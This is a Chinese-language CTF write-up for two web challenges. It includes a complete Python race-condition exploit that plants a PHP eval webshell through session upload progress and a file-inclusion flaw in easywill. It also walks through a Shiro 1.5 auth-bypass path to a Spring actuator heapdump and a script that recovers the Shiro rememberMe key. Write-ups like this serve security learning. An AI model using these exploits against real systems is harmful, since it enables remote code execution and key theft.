Web1 easywill

题目没有给源码,根据描述从网上下一份easywillV2.1.5(https://gitee.com/willphp/willphpv2/tree/808b3a36d366f66a88fd130cc6514c20eaf15450/)

首页中assign可控两个参数,其中根据view函数发现覆盖变量cfile

尝试session包含

Exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# coding=utf-8
import io
import requests
import threading

sessid = 'flag'
data = {"cmd": "system('cat /ffffffff14ggggggg3');"}
url = "http://eci-2zec2ffu8ckzf0eggcpe.cloudeci1.ichunqiu.com/index.php"

def write(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
resp = session.post(url,
data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'},
files={'file': ('midi.txt', f)}, cookies={'PHPSESSID': sessid})


def read(session):
while True:
resp = session.post(url+'?name=cfile&value=/tmp/sess_' + sessid,
data=data)
if 'midi.txt' in resp.text:
print(resp.text)
event.clear()
else:
pass


if __name__ == "__main__":
event = threading.Event()
with requests.session() as session:
for i in range(1, 30):
threading.Thread(target=write, args=(session,)).start()

for i in range(1, 30):
threading.Thread(target=read, args=(session,)).start()
event.set()

Web2 Pentest in Autumn

题目给的附件pom.xml

Pom.xml 中有actuator

http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator

Springboot中actuator常见接口(1.x能够直接访问,2.x是在actuator目录下)

由于没有权限,接下来访问都是302

http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator/health

http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator/env

(信息泄露)

Shiro1.5 鉴权绕过去下载文件

http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/aa/../;test=/actuator/health

把文件都下载下来

下载heapdump

http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/aa/../;test=/actuator/heapdump

利用 visualvm 打开下载的heapdump文件

https://visualvm.github.io/download.html

全局搜索org.apache.shiro.web.mgt.CookieRememberMeManager

将byte转换成base64形式的key

1
2
3
4
5
import base64
import struct

res = base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb', 58,5,22,5,117,45,-35,82,-15,62,-57,117,-78,15,23,-89))
print(res)

(参考:https://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.html)

CB链,Spring回显